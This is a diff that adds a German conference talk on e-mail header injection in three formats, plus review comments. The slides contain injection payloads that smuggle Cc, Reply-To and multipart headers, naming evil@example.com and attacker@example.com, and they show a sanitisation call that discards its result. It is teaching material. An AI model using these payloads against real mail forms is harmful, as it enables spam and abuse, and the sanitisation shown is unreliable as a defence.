| 2018_05_16_25th/email-header-injection/mailheaderinjection.latex |
| 2018_05_16_25th/email-header-injection/mailheaderinjection.tpp.bin |
| 2018_05_16_25th/email-header-injection/mailheaderinjection.txt |
| 2018_05_16_25th/scriptless-attacks/scriptless-attacks.pdf |
2018_05_16_25th/email-header-injection/mailheaderinjection.latex
New file @@ -0,0 +1,150 @@ % Filename: tpp.tex % Purpose: template file for tpp latex export % Authors: (c) Andreas Gredler, Michael Prokop http://grml.org/ % License: This file is licensed under the GPL v2. % Latest change: Fre Apr 15 20:34:37 CEST 2005 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \documentclass{beamer} \mode<presentation> { \usetheme{Montpellier} \setbeamercovered{transparent} } \usepackage[german]{babel} \usepackage{umlaut} \usepackage[latin1]{inputenc} \usepackage{times} \usepackage[T1]{fontenc} \title[ E-Mail Header Injection]{ E-Mail Header Injection} \begin{document} \begin{frame}[fragile] \begin{verbatim} \author{Steve Ulrich, Micromata GmbH} \end{verbatim} \end{frame} \section{Just Another Injection} \begin{frame}[fragile] \begin{verbatim} \title[Die Inspiration]{Die Inspiration} public void sendContactForm(String subject, String content) { String template = "From: "+user.getEmail()+"\n"+ "To: "+contactEmail +"\n"+ "Subject: "+subject+"\n"+ "\n"+ content; sendEmail(template); } \title[Das Problem]{Das Problem} http://xxx/sendContactForm ?subject=sometext%0ACc%3A+evil%40example.com &text=sometext \title[Das Resultat]{Das Resultat} From: user@example.com To: contact@example.com Subject: sometext Cc: evil@example.com sometext \title[Also nur eine Injection Lücke?]{Also nur eine Injection Lücke?} Nutzen wir also eine API (JavaMail), die wird uns schon schützen! Letzte Worte eines Entwicklers \title[JavaMail to the R...]{JavaMail to the R...} String subject = "sometext\nevil@example.com"; final MimeMessage msg = .. msg.setSender(new InternetAddress(user.getEmail())); msg.setRecipient(RecipientType.TO, new InternetAddress(contactEmail)); msg.setSubject(subject); msg.setText("BlahBlah"); \title[JavaMail to the R...WTF]{JavaMail to the R...WTF} 
From: user@example.com To: contact@example.com Subject: sometext Cc: evil@example.com BlahBlah \title[Ein Bug?]{Ein Bug?} Es exitiert ein Issue: CSNC-2014-001 The assessment from our engineering team is that this is not a bug in JavaMail API. The application is responsible to perform some input validation. In this particular case, the application is responsible for ensuring that the subject string does not contain any line breaks. The code demonstrated the issue is not an Oracle sample. Therefore, we are closing the issue as not-a-bug. Oracle \title[Validierung]{Validierung} Eine Grundregel bei Input Validation ist "Versuche es nicht selbst". Keine Regel ohne Ausnahme subject.replaceAll("[\\n\\r]+", " "); \title[Spaß mit Header Injection]{Spaß mit Header Injection} String subject = "Test" // This will be the subject + "\n" + "\nEvil content" From: user@example.com To: contact@example.com Subject: sometext Evil Content BlahBlah \title[Multipart injection]{Multipart injection} String subject = "Cheap Viagra" + "\nReply-To:attacker@example.com" // Man bittet um Antwort + "\nMIME-Version: 1.0" // Content-Header + "\nContent-Type: multipart/mixed; boundary=frontier" + "\n" // Empty line separates the Content! + "\n--frontier" + "\nContent-Type: text/plain\n" // Oder Fancy HTML? + "\nBilliges Viagra" // So günstig + "\n--frontier" + "\nContent-Type: text/nonsense" // jetzt den alten Content raus + "\n" // Empty line separates the Content! \end{verbatim} \end{frame} \end{document} %%%%% END OF FILE %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 2018_05_16_25th/email-header-injection/mailheaderinjection.tpp.bin
New file @@ -0,0 +1,155 @@ --title E-Mail Header Injection --author Steve Ulrich, Micromata GmbH --heading Just Another Injection --newpage --title Die Inspiration --beginoutput public void sendContactForm(String subject, String content) { String template = "From: "+user.getEmail()+"\n"+ "To: "+contactEmail +"\n"+ "Subject: "+subject+"\n"+ "\n"+ content; sendEmail(template); } --endoutput --newpage --title Das Problem --beginoutput http://xxx/sendContactForm --color red ?subject=sometext%0ACc%3A+evil%40example.com --color white &text=sometext --endoutput --newpage --title Das Resultat --beginoutput From: user@example.com To: contact@example.com Subject: sometext --color red Cc: evil@example.com --color white sometext --endoutput --newpage --title Also nur eine Injection Lücke? Nutzen wir also eine API (JavaMail), die wird uns schon schützen! --- --right Letzte Worte eines Entwicklers --newpage --title JavaMail to the R... --beginoutput --color red String subject = "sometext\nevil@example.com"; --color white final MimeMessage msg = .. msg.setSender(new InternetAddress(user.getEmail())); msg.setRecipient(RecipientType.TO, new InternetAddress(contactEmail)); --color green msg.setSubject(subject); --color white msg.setText("BlahBlah"); --endoutput --newpage --title JavaMail to the R...WTF --beginoutput 
From: user@example.com To: contact@example.com Subject: sometext --color red Cc: evil@example.com --color white BlahBlah --endoutput --newpage --title Ein Bug? Es exitiert ein Issue: CSNC-2014-001 --- --beginoutput The assessment from our engineering team is that this is not a bug in JavaMail API. The application is responsible to perform some input validation. In this particular case, the application is responsible for ensuring that the subject string does not contain any line breaks. The code demonstrated the issue is not an Oracle sample. Therefore, we are closing the issue as not-a-bug. --endoutput --right Oracle --newpage --title Validierung Eine Grundregel bei Input Validation ist "Versuche es nicht selbst". --- --center Keine Regel ohne Ausnahme --beginoutput subject.replaceAll("[\\n\\r]+", " "); --endoutput --newpage --title Spaß mit Header Injection --beginoutput String subject = "Test" // This will be the subject --color red + "\n" + "\nEvil content" --color white --endoutput --- --beginoutput From: user@example.com To: contact@example.com Subject: sometext --color red Evil Content --color white BlahBlah --endoutput --newpage --title Multipart injection --beginoutput String subject = "Cheap Viagra" + "\nReply-To:attacker@example.com" // Man bittet um Antwort --color red + "\nMIME-Version: 1.0" // Content-Header + "\nContent-Type: multipart/mixed; boundary=frontier" --color white + "\n" // Empty line separates the Content! --color red + "\n--frontier" + "\nContent-Type: text/plain\n" // Oder Fancy HTML? --color white + "\nBilliges Viagra" // So günstig --color red + "\n--frontier" + "\nContent-Type: text/nonsense" // jetzt den alten Content raus --color white + "\n" // Empty line separates the Content! --endoutput 2018_05_16_25th/email-header-injection/mailheaderinjection.txt
New file @@ -0,0 +1,127 @@ Title: E-Mail Header Injection Author: Steve Ulrich, Micromata GmbH Just Another Injection ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Title: Die Inspiration .--------------------------- | public void sendContactForm(String subject, String content) { | String template = | "From: "+user.getEmail()+"\n"+ | "To: "+contactEmail +"\n"+ | "Subject: "+subject+"\n"+ | "\n"+ | content; | sendEmail(template); | } `--------------------------- Title: Das Problem .--------------------------- | http://xxx/sendContactForm | ?subject=sometext%0ACc%3A+evil%40example.com | &text=sometext `--------------------------- Title: Das Resultat .--------------------------- | From: user@example.com | To: contact@example.com | Subject: sometext | Cc: evil@example.com | | sometext `--------------------------- Title: Also nur eine Injection Lücke? Nutzen wir also eine API (JavaMail), die wird uns schon schützen! Letzte Worte eines Entwicklers Title: JavaMail to the R... .--------------------------- | String subject = "sometext\nevil@example.com"; | | final MimeMessage msg = .. | msg.setSender(new InternetAddress(user.getEmail())); | msg.setRecipient(RecipientType.TO, new InternetAddress(contactEmail)); | msg.setSubject(subject); | msg.setText("BlahBlah"); `--------------------------- Title: JavaMail to the R...WTF .--------------------------- | 
From: user@example.com | To: contact@example.com | Subject: sometext | Cc: evil@example.com | | BlahBlah `--------------------------- Title: Ein Bug? Es exitiert ein Issue: CSNC-2014-001 .--------------------------- | The assessment from our engineering team is that this is not a bug in JavaMail | API. The application is responsible to perform some input validation. In this | particular case, the application is responsible for ensuring that the subject | string does not contain any line breaks. The code demonstrated the issue is not | an Oracle sample. Therefore, we are closing the issue as not-a-bug. `--------------------------- Oracle Title: Validierung Eine Grundregel bei Input Validation ist "Versuche es nicht selbst". Keine Regel ohne Ausnahme .--------------------------- | subject.replaceAll("[\\n\\r]+", " "); `--------------------------- Title: Spaß mit Header Injection .--------------------------- | String subject = "Test" // This will be the subject | + "\n" | + "\nEvil content" `--------------------------- .--------------------------- | From: user@example.com | To: contact@example.com | Subject: sometext | | Evil Content | | BlahBlah `--------------------------- Title: Multipart injection .--------------------------- | String subject = "Cheap Viagra" | + "\nReply-To:attacker@example.com" // Man bittet um Antwort | + "\nMIME-Version: 1.0" // Content-Header | + "\nContent-Type: multipart/mixed; boundary=frontier" | + "\n" // Empty line separates the Content! | + "\n--frontier" | + "\nContent-Type: text/plain\n" // Oder Fancy HTML? | + "\nBilliges Viagra" // So günstig | + "\n--frontier" | + "\nContent-Type: text/nonsense" // jetzt den alten Content raus | + "\n" // Empty line separates the Content! `--------------------------- 2018_05_16_25th/scriptless-attacks/scriptless-attacks.pdfBinary files differ
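Review bot: In mailheaderinjection.latex the `\author{Steve Ulrich, Micromata GmbH}` line and every per-slide `\title[...]{...}` sit inside a `\begin{frame}[fragile] \begin{verbatim} ... \end{verbatim} \end{frame}` block, so beamer will print those commands as literal text on one very long frame instead of producing titled slides; `\author` belongs before `\begin{document}` next to the existing `\title`, and each `--newpage` of the tpp source needs its own `\begin{frame}` / `\end{frame}` pair. Separately, `\usepackage[latin1]{inputenc}` must match the actual byte encoding of "Lücke", "Spaß" and "günstig" in the file, otherwise those umlauts render as mojibake; check what the export wrote and switch to `[utf8]` if the file is UTF-8.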
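Review bot: On the "Validierung" slide of mailheaderinjection.tpp.bin, `subject.replaceAll("[\\n\\r]+", " ");` discards its result: Java strings are immutable and `replaceAll` returns a new `String`, so as written the subject is unchanged and the line break still reaches `setSubject`. The slide should show `subject = subject.replaceAll("[\\n\\r]+", " ");` (or the validation rejecting the input outright). Also, the output box on "Spaß mit Header Injection" shows `Subject: sometext` and `Evil Content` while the code above it sets the subject to `"Test"` and appends `"Evil content"`; the two boxes should agree so the reader can trace the injected blank line to the body. Finally, "Es exitiert ein Issue" should read "Es existiert ein Issue".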
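Review bot: mailheaderinjection.txt is a generated export of mailheaderinjection.tpp.bin and carries the same defects (the discarded `replaceAll` result, the `exitiert` typo, the mismatched `Subject:` on the "Spaß" slide), so any fix must be made in the tpp source and both exports regenerated, or the three copies will drift; consider committing only the .tpp source together with the export command, or adding a one-line note in the commit message stating that .txt and .latex are derived files.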